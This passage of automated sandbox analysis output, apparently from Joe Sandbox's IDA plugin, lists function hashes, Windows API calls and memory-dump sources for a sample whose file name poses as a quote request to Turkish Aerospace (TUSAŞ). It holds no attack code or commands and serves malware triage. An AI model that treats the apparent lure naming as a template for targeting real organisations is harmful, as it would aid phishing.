                                                                                                                                    • Instruction ID: 3ac04f17d7d6a8885c593f9069bcc4f1f722d55b5c8a29cfe684c674fab075c7
                                                                                                                                    • Opcode Fuzzy Hash: 9cdd8438ba37efef1e0cea5e961f6251a988ec5ad5ac2d0be7bc796c748e708d
                                                                                                                                    • Instruction Fuzzy Hash: 9E918175A002089FCB14DF58C484EBABBF1BF45314F198099E94A9F3A2D735EE85CB90
                                                                                                                                    APIs
                                                                                                                                    • __startOneArgErrorHandling.LIBCMT ref: 001AE30D
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorHandling__start
                                                                                                                                    • String ID: pow
                                                                                                                                    • API String ID: 3213639722-2276729525
                                                                                                                                    • Opcode ID: 5bba3afa8d6bae5f196ecb6e131831e846819b19db7f98d5c19c58d36eaf0a91
                                                                                                                                    • Instruction ID: 117a93bece759ce18eaa06f84512300665341315e312d3dd1e7d9efb5174d019
                                                                                                                                    • Opcode Fuzzy Hash: 5bba3afa8d6bae5f196ecb6e131831e846819b19db7f98d5c19c58d36eaf0a91
                                                                                                                                    • Instruction Fuzzy Hash: 93518E65A0C202A6CF257764DD053F93BE8FF91780F308D99F0D6822E9EB35CC959A46
                                                                                                                                    APIs
                                                                                                                                    • CharUpperBuffW.USER32(001D569E,00000000,?,0021CC08,?,00000000,00000000), ref: 002078DD
                                                                                                                                      • Part of subcall function 00186B57: _wcslen.LIBCMT ref: 00186B6A
                                                                                                                                    • CharUpperBuffW.USER32(001D569E,00000000,?,0021CC08,00000000,?,00000000,00000000), ref: 0020783B
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: BuffCharUpper$_wcslen
                                                                                                                                    • String ID: <s$
                                                                                                                                    • API String ID: 3544283678-3928034050
                                                                                                                                    • Opcode ID: 97b79f69ec349d47b3900dbd142ef91ff27ab942bfa9620061caa936264f7f4e
                                                                                                                                    • Instruction ID: 5575dc7c90b20635a6e86a3f654b5f52395ea98d4d34d2b4a828e7e055d98f98
                                                                                                                                    • Opcode Fuzzy Hash: 97b79f69ec349d47b3900dbd142ef91ff27ab942bfa9620061caa936264f7f4e
                                                                                                                                    • Instruction Fuzzy Hash: 50613A76924219ABCF04FBA4CC91DFDB378BF28700B544129E542A7092EF64AA15DBA0
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: #
                                                                                                                                    • API String ID: 0-1885708031
                                                                                                                                    • Opcode ID: 9cf4b09956c092b60c4d76233025f0d947eaf2a38432cb6a7b5d2460e7904d28
                                                                                                                                    • Instruction ID: f568d011f7208c93c890b5f41389180025b1c71475faec358f2bf16647449f5e
                                                                                                                                    • Opcode Fuzzy Hash: 9cf4b09956c092b60c4d76233025f0d947eaf2a38432cb6a7b5d2460e7904d28
                                                                                                                                    • Instruction Fuzzy Hash: A651F075904246DFDF19EF68C481AFA7BE8EF65311F24405AE8919F2D0DB349E42CBA0
                                                                                                                                    APIs
                                                                                                                                    • Sleep.KERNEL32(00000000), ref: 0019F2A2
                                                                                                                                    • GlobalMemoryStatusEx.KERNEL32(?), ref: 0019F2BB
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: GlobalMemorySleepStatus
                                                                                                                                    • String ID: @
                                                                                                                                    • API String ID: 2783356886-2766056989
                                                                                                                                    • Opcode ID: 2d7c778334f64aa97c44cca117e52220ce0fd62803d5e0a056703761f108c10e
                                                                                                                                    • Instruction ID: 3fbb31d181fbd23dd27576c483b759f8b4e43092116dc3d58e0166b818d8b8a8
                                                                                                                                    • Opcode Fuzzy Hash: 2d7c778334f64aa97c44cca117e52220ce0fd62803d5e0a056703761f108c10e
                                                                                                                                    • Instruction Fuzzy Hash: 425147714087449BE320AF14EC86BAFBBF8FF95304F91885DF2D951195EB308629CB66
                                                                                                                                    APIs
                                                                                                                                    • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 002057E0
                                                                                                                                    • _wcslen.LIBCMT ref: 002057EC
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: BuffCharUpper_wcslen
                                                                                                                                    • String ID: CALLARGARRAY
                                                                                                                                    • API String ID: 157775604-1150593374
                                                                                                                                    • Opcode ID: ce826199dfbaa8904e9ec33e4e05034a3042e4643dde51aa70a485ef0b1a0e8c
                                                                                                                                    • Instruction ID: 67a03ae9e8d7d7e13279e0d57e79fd38698668da142f58830eea5acf3eda0ba7
                                                                                                                                    • Opcode Fuzzy Hash: ce826199dfbaa8904e9ec33e4e05034a3042e4643dde51aa70a485ef0b1a0e8c
                                                                                                                                    • Instruction Fuzzy Hash: CC419031A1061A9FCB04DFA9C8858BEBBB5FF69310F148069E905A7292E7709D91CF90
                                                                                                                                    APIs
                                                                                                                                    • _wcslen.LIBCMT ref: 001FD130
                                                                                                                                    • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 001FD13A
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CrackInternet_wcslen
                                                                                                                                    • String ID: |
                                                                                                                                    • API String ID: 596671847-2343686810
                                                                                                                                    • Opcode ID: a03060fff5f825c36132c059a4b4283b3b84dac02c5bf49e2642a0c857b85927
                                                                                                                                    • Instruction ID: c57c5c1d97b99b27d4b3beb40fef9a9ee58dc1668c2ff28590fb2d546eca1d31
                                                                                                                                    • Opcode Fuzzy Hash: a03060fff5f825c36132c059a4b4283b3b84dac02c5bf49e2642a0c857b85927
                                                                                                                                    • Instruction Fuzzy Hash: A7312C75D00209ABCF15EFA4DC85AEEBFBAFF19300F100059F915A6162DB31AA16DF60
                                                                                                                                    APIs
                                                                                                                                    • DestroyWindow.USER32(?,?,?,?), ref: 00213621
                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0021365C
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$DestroyMove
                                                                                                                                    • String ID: static
                                                                                                                                    • API String ID: 2139405536-2160076837
                                                                                                                                    • Opcode ID: 49f7a5a48a27dae76236487b6f257b30469494272efab76356eb867b284215f3
                                                                                                                                    • Instruction ID: beed33ef54d9d4b0cf9e4b578c3eea0715e8dbb5e167efc7b4c96addedf67ac4
                                                                                                                                    • Opcode Fuzzy Hash: 49f7a5a48a27dae76236487b6f257b30469494272efab76356eb867b284215f3
                                                                                                                                    • Instruction Fuzzy Hash: CC318071110205AADB10DF28DC80AFB73EEFFA8764F108619F96597180DB30ADA1CB64
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 0021461F
                                                                                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00214634
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend
                                                                                                                                    • String ID: '
                                                                                                                                    • API String ID: 3850602802-1997036262
                                                                                                                                    • Opcode ID: 5b2ad80ae7dcc3ac8636eb659d0d446bd4daf0a1f971fb74845067db97b9dd65
                                                                                                                                    • Instruction ID: 03f79103a95c7f13b49d1b56e65703ba96e716dd5de180600ad1f98afb7ab595
                                                                                                                                    • Opcode Fuzzy Hash: 5b2ad80ae7dcc3ac8636eb659d0d446bd4daf0a1f971fb74845067db97b9dd65
                                                                                                                                    • Instruction Fuzzy Hash: 87314974A0030AAFDB14DF69C980BDA7BFAFF29300F54406AE908AB341D770A951CF90
                                                                                                                                    APIs
                                                                                                                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 001C33A2
                                                                                                                                      • Part of subcall function 00186B57: _wcslen.LIBCMT ref: 00186B6A
                                                                                                                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00183A04
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: IconLoadNotifyShell_String_wcslen
                                                                                                                                    • String ID: Line:
                                                                                                                                    • API String ID: 2289894680-1585850449
                                                                                                                                    • Opcode ID: 83338ad26ebfb1bd58dcf6108479f56a03d7aec42cc855bb3123fa2d856558b9
                                                                                                                                    • Instruction ID: ec86fb9c13fe489d4b01d767d9a661e99eff2859342f50f692126fa1afbd622c
                                                                                                                                    • Opcode Fuzzy Hash: 83338ad26ebfb1bd58dcf6108479f56a03d7aec42cc855bb3123fa2d856558b9
                                                                                                                                    • Instruction Fuzzy Hash: 1031E571408300AAC325FB10EC49BEBB7D8AF51714F04455EF5A983091EB709759CBC6
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0021327C
                                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00213287
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend
                                                                                                                                    • String ID: Combobox
                                                                                                                                    • API String ID: 3850602802-2096851135
                                                                                                                                    • Opcode ID: 0e9cc93ab56e8944c0937db14d8f94670ffabfcd6d87fa33fd9c0b9744014f9d
                                                                                                                                    • Instruction ID: efaabf2121d266270f4f2627cc7e08b30ea0ebbe9974075fa40310fdcafc242d
                                                                                                                                    • Opcode Fuzzy Hash: 0e9cc93ab56e8944c0937db14d8f94670ffabfcd6d87fa33fd9c0b9744014f9d
                                                                                                                                    • Instruction Fuzzy Hash: 4A1182713202097FFF25EE54DC85EFB37ABEBA8364F104125F91897290D6719DA18B60
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0018600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0018604C
                                                                                                                                      • Part of subcall function 0018600E: GetStockObject.GDI32(00000011), ref: 00186060
                                                                                                                                      • Part of subcall function 0018600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0018606A
                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0021377A
                                                                                                                                    • GetSysColor.USER32(00000012), ref: 00213794
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                    • String ID: static
                                                                                                                                    • API String ID: 1983116058-2160076837
                                                                                                                                    • Opcode ID: d89ce050cd387b607e15e6660d21e8ef43946827e4b055d62b0225716877ec3f
                                                                                                                                    • Instruction ID: d1307b332fddd44192a071df9a073958a4943e3d6f42b57e2677a48a7ea39b27
                                                                                                                                    • Opcode Fuzzy Hash: d89ce050cd387b607e15e6660d21e8ef43946827e4b055d62b0225716877ec3f
                                                                                                                                    • Instruction Fuzzy Hash: 77116AB262020AAFDF11DFA8CC49EEA7BF9FB18314F104514F955E2250D734E9619B50
                                                                                                                                    APIs
                                                                                                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 001FCD7D
                                                                                                                                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 001FCDA6
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Internet$OpenOption
                                                                                                                                    • String ID: <local>
                                                                                                                                    • API String ID: 942729171-4266983199
                                                                                                                                    • Opcode ID: a7177ca8c53e785f7c9afac563cbe31f186c043e5f4ec396a4b162e9b88cb2d8
                                                                                                                                    • Instruction ID: ed50aeb23afd505cff7b1eab9c0e02b624120a172022ec4fc702a57b20433750
                                                                                                                                    • Opcode Fuzzy Hash: a7177ca8c53e785f7c9afac563cbe31f186c043e5f4ec396a4b162e9b88cb2d8
                                                                                                                                    • Instruction Fuzzy Hash: 1111CA7564563D79D7384BA68C49FFBBE5CEF127A4F104225B20983080D7705841E6F0
                                                                                                                                    APIs
                                                                                                                                    • GetWindowTextLengthW.USER32(00000000), ref: 002134AB
                                                                                                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 002134BA
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LengthMessageSendTextWindow
                                                                                                                                    • String ID: edit
                                                                                                                                    • API String ID: 2978978980-2167791130
                                                                                                                                    • Opcode ID: 7be12363f0030d5cff690756ae5e8bc3ce6f5020947517a83e7950a31199ee2f
                                                                                                                                    • Instruction ID: 122bf57dfd80b90fdcceefc6ef6bbd03c09cdd13ceeee6852415dee344026806
                                                                                                                                    • Opcode Fuzzy Hash: 7be12363f0030d5cff690756ae5e8bc3ce6f5020947517a83e7950a31199ee2f
                                                                                                                                    • Instruction Fuzzy Hash: 1F118F71120209AFEB219E64EC44AFB37ABEB25374F604324F965931D0C771DDA19B54
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00189CB3: _wcslen.LIBCMT ref: 00189CBD
                                                                                                                                    • CharUpperBuffW.USER32(?,?,?), ref: 001E6CB6
                                                                                                                                    • _wcslen.LIBCMT ref: 001E6CC2
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _wcslen$BuffCharUpper
                                                                                                                                    • String ID: STOP
                                                                                                                                    • API String ID: 1256254125-2411985666
                                                                                                                                    • Opcode ID: 3cef5ec0a1bdd8b46ac681e2fb513c9ad3ba7cc522364b65f152bf4a2cb51cfe
                                                                                                                                    • Instruction ID: 3f2b8da5efa3da4ebba664c69fab3e084acc30c6dbdf959e6b81394fccb0fa8e
                                                                                                                                    • Opcode Fuzzy Hash: 3cef5ec0a1bdd8b46ac681e2fb513c9ad3ba7cc522364b65f152bf4a2cb51cfe
                                                                                                                                    • Instruction Fuzzy Hash: 5C01C4326109A68BCB20AFFEDC909BF77A5FB717907E10529E89297191EB31D940C750
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00189CB3: _wcslen.LIBCMT ref: 00189CBD
                                                                                                                                      • Part of subcall function 001E3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 001E3CCA
                                                                                                                                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 001E1C46
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ClassMessageNameSend_wcslen
                                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                                    • API String ID: 624084870-1403004172
                                                                                                                                    • Opcode ID: de106258ebe5c59c0864b93e90e84fa3669a9d6e165ff4a968e5791240877d58
                                                                                                                                    • Instruction ID: 9364dbeaa91b819245975e69456bbbab4c133cac29b61f5d384457a47fa55aa6
                                                                                                                                    • Opcode Fuzzy Hash: de106258ebe5c59c0864b93e90e84fa3669a9d6e165ff4a968e5791240877d58
                                                                                                                                    • Instruction Fuzzy Hash: AB01A7757815487BCB08FB91D9559FF77A89F22340F240019B416B7282EB319F189BB1
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00189CB3: _wcslen.LIBCMT ref: 00189CBD
                                                                                                                                      • Part of subcall function 001E3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 001E3CCA
                                                                                                                                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 001E1CC8
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
